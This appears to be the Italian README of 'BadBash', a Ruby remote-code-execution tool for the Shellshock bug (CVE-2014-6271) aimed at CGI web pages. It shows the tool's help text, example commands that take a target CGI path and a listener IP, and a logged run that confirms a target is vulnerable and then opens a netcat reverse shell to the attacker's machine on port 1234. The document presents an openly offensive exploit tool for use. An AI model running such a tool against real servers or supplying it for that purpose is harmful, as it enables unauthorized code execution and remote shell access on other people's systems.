
Strumento PoC RCE per CVE-2014-6271 (ShellShock)
CVE-2014-6271 (ShellShock) RCE PoC tool
======= BadBash è uno strumento di exploit RCE per CVE-2014-6271. La versione base controlla solo il sito HTTP CGI e fornisce solo una reverse shell netcat sulla porta 1234.
Sviluppatore : Andy Yang Versione : 0.1.0 Licenza : GPLv3
Progetto GitHub originale : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - strumento RCE per CVE-2014-6271 di Andy Yang La versione base controlla solo il sito HTTP La versione base fornisce solo una reverse shell netcat sulla porta 1234
ESEMPIO DI UTILIZZO:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path Percorso completo della pagina CGI
-d, --Destination IP Il tuo indirizzo IP in ascolto per una connessione in entrata
-h, --help Mostra l'aiuto
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Verifica se il target è vulnerabile........
[Info] Potrebbero essere necessari fino a 10 secondi........
[Info] Il target è vulnerabile!!!
[Info] Usa NC per ascoltare sulla porta 1234 per la reverse shell..........
[Info] Esecuzione dell'exploit per una reverse shell verso 172.16.189.1:1234 tramite netcat ..........